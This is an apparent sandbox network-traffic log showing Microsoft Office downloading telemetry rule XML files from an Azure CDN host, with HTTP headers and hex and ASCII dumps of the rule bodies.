                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:58 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:58 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 502
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                        ETag: "0x8DC582BB6A0D312"
                                                                                                        x-ms-request-id: a00703cc-001e-0017-37c7-490c3c000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124958Z-r1cf579d778469knhC1EWR2gqc000000013g000000006ny7
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:58 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        66192.168.2.84979013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:58 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:59 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:58 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 407
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                                        x-ms-request-id: 09205d62-a01e-0021-3a05-48814c000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124958Z-r1cf579d778t5c2lhC1EWRce3w0000000900000000007wxp
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:59 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        67192.168.2.84979113.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:59 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:59 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:59 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 474
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                                        x-ms-request-id: 9160dc9b-d01e-00ad-5f02-48e942000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124959Z-r1cf579d778dndrdhC1EWR4b24000000081g000000004ayu
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:59 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        68192.168.2.84979213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:59 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:59 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:59 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 408
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                                        x-ms-request-id: a215b4dd-e01e-0071-4e03-4808e7000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124959Z-r1cf579d7788pwqzhC1EWRrpd800000008mg000000005zrb
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:59 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        69192.168.2.84979313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:59 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:59 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:59 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 469
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                                        x-ms-request-id: 1f17df4b-601e-0050-2d03-482c9c000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124959Z-r1cf579d778bb9vvhC1EWRs954000000082g00000000139u
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:59 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        70192.168.2.84979413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:00 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:01 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:00 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 416
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                                        x-ms-request-id: 4c7743ed-001e-0082-4b03-485880000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125000Z-r1cf579d778qlpkrhC1EWRpfc80000000900000000006v76
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:01 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        71192.168.2.84979513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:00 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:01 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:00 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 472
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                                        x-ms-request-id: a374b664-e01e-0051-1f05-4884b2000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125000Z-r1cf579d778lntp7hC1EWR9gg400000007r0000000009dze
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:01 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        72192.168.2.84979813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:01 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:01 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:01 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 427
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                        ETag: "0x8DC582BB464F255"
                                                                                                        x-ms-request-id: 8332a10a-c01e-0079-4304-48e51a000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125001Z-r1cf579d7789trgthC1EWRkkfc000000093g000000003k1a
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:01 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        73192.168.2.84979713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:01 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:01 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:01 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 475
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                        ETag: "0x8DC582BBA740822"
                                                                                                        x-ms-request-id: f6e8c48a-401e-000a-8008-484a7b000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125001Z-r1cf579d7786c2tshC1EWRr1gc00000007y00000000088e8
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:01 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        74192.168.2.84979913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:02 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:03 UTC491INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:03 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 474
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                                        x-ms-request-id: 11351553-001e-002b-2f7e-4999f2000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125003Z-r1cf579d778n9656hC1EWRqns000000000t0000000001zbu
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        X-Cache-Info: L1_T2
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:03 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        75192.168.2.84980013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:02 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:03 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:03 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 419
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                                        x-ms-request-id: a2a82b19-a01e-0002-2e1e-495074000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125003Z-r1cf579d778t76vqhC1EWRdx4w00000002c0000000004vu1
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
